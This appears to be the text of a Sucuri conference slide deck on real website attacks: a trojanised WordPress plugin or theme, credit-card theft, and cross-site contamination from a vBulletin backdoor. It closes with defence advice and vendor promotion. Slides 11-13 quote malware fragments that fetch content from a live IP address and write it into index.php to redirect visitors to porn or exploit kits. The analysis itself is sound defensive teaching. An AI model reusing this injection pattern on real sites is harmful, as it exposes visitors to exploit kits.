2. This is me!
Sucuri Inc.
Website Security
o Incident Handling
o Log Analysis
o
o
Tony Perez, COO - Sucuri, Inc.
sucuri.net
@perezbox
3. Let’s Learn from Website Attacks
Analyze some of the things we have seen in
recent days/weeks, and better understand
what we need to be doing as website owners.
Tony Perez, COO - Sucuri, Inc.
sucuri.net
@perezbox
4.
5. Attack Scenerios
o
The Art of Phishing
o
Stealing Credit Cards
Tony Perez, COO - Sucuri, Inc.
sucuri.net
@perezbox
11. Intent
o Redirection - porn or exploit kits
o Target: index.php
o Taking content from here:
$code_txt = 'http://91.239.15.61/o1.txt’;
o Placing it in the files here:
$index_path = $path.'/index.php';
if(file_put_contents($index_path, $code)){
Tony Perez, COO - Sucuri, Inc.
sucuri.net
@perezbox
12. How?
o Index.php payload:
o Using curl to pull content from here:
$url = http://91.239.15.61/java/google.php;
Tony Perez, COO - Sucuri, Inc.
sucuri.net
@perezbox
13. Payload
o Pulls content from:
http://91.239.15.61/google.js - Redirection to Porn Sites
http://91.239.15.61/g.php - Exploit Kits
Tony Perez, COO - Sucuri, Inc.
sucuri.net
@perezbox
14. Lesson to Be Learned
o
Trust but verify sources
o
This is not isolated to just plugins, it can happen to
themes as well
o
This is the season in which attackers prey on our
need to spend $$$ and be online. Be vigilant!
o
The vulnerability was the website administrator…
Tony Perez, COO - Sucuri, Inc.
sucuri.net
@perezbox
16. Got e-Commerce?
o
Business owners <3 E-commerce
o
CMS extensibility = WooCommerce
o Quick setup of payment collection systems for
goods
o
Awesome, right?
Tony Perez, COO - Sucuri, Inc.
sucuri.net
@perezbox
17. Big Target
o
Credit Card = Cha-Ching
o
Used/shared/sold underground
o
Impact is catastrophic
o Blacklisting
o Ban
o
No more cash flow! No more Trust!
Tony Perez, COO - Sucuri, Inc.
sucuri.net
@perezbox
18. Cross-contamination
Simple concept in which your website is attacked and
infected by a neighboring site in the same
environment
Tony Perez, COO - Sucuri, Inc.
sucuri.net
@perezbox
19. vBulletin
o
Popular CMS Application for Forums
o
WordPress + vBulletin Configurations Common
Tony Perez, COO - Sucuri, Inc.
sucuri.net
@perezbox
20. Scenerio
o
WordPress: Main website | Blog | e-Commerce
o
vBulletin: Forum
o
1 Server
Tony Perez, COO - Sucuri, Inc.
sucuri.net
@perezbox
25. vBulletin Plugin
o
Backdoor shell was installed into vBulletin giving
the attacker the tools they needed to attack the
WordPress installation.
Tony Perez, COO - Sucuri, Inc.
sucuri.net
@perezbox
28. Lessons to be Learned
o
Attackers are smart – surprise!!!
o
Cross-contamination is a real threat today!
o
Must be diligent across our stack!
o
Isolate applications if possible.
Tony Perez, COO - Sucuri, Inc.
sucuri.net
@perezbox
30. Harsh Reality
None of the security plugins out there would
have prevented either of these attacks. So much
for all those hardening tips..
Tony Perez, COO - Sucuri, Inc.
sucuri.net
@perezbox
31. Two Important Vectors
o
Access control
o Within your control…
o
Software vulnerabilities
o Not so much…
Tony Perez, COO - Sucuri, Inc.
sucuri.net
@perezbox
32. Defense in Depth
• There is no single cure
• Layered Defenses
• Combination of tools and actions
– Combine: Protection and Detection
Tony Perez, COO - Sucuri, Inc.
sucuri.net
@perezbox
33. Access Control
o Google Authenticator – 2FA
o http://wordpress.org/plugins/google-authenticator/
o Duo Security – 2FA
o http://wordpress.org/plugins/duo-wordpress/
o Login Secure Solutions – Policy / Enforcement
o http://wordpress.org/plugins/login-security-solution/
o Sucuri CloudProxy / Detection / Remedation - Complete Website Security
o http://sucuri.net/signup
Tony Perez, COO - Sucuri, Inc.
sucuri.net
@perezbox
34. Software Vulnerabilities
o Trusted Sources
o Start with the repo and established communities
o If you’re not a developer this is going to be beyond your
reach mostly
o Web Application Firewall (WAF) Plugins
o Highly ineffective, evading and bypassing is easy
o Cause Denial of Service attacks
o SaaS based Web Application Firewall (WAF) more effective!
o Sucuri CloudProxy WAF
Tony Perez, COO - Sucuri, Inc.
sucuri.net
@perezbox
35. Auditing
• Know what is going on with your site
– Integrity Checks
– Logging in / Logging out
– Changes being made
• More important than half the hardening tips you read on line today
• Options:
– WP Security Audit log http://wordpress.org/plugins/wp-securityaudit-log/
– Sucuri Premium Plugin
http://wordpress.sucuri.net
Tony Perez, COO - Sucuri, Inc.
sucuri.net
@perezbox
36. If all else fails…
o Be sure you have backups…
o VaultPress – WordPress Sites
o Sucuri Backups – WordPress and Everything else
o SaaS based Backups more effective!
Tony Perez, COO - Sucuri, Inc.
sucuri.net
@perezbox
37. Tony Perez
@perezbox | @sucuri_security
tony@sucuri.net
#wordsesh
Tony Perez, COO - Sucuri, Inc.
sucuri.net
@perezbox
Editor's Notes
Defense in depth is a pretty standard phrase used in the security world in which there is no dependency on any one control, but rather a series of controls implemented throughout the stack to ensure the integrity and security. It’s simple and effective, yet many don’t apply it for whatever reason. We’re too busy focusing on that quick solution that will end all my problems. That one plugins that will harden my entire site to the point where I won’t be able to access it and none of my plugins will work.
Be sure to check out Jason Cosper’s presentation earlier this evening, should be up on WordSesh soon, but he goes through some good tips on hardening your WordPress site.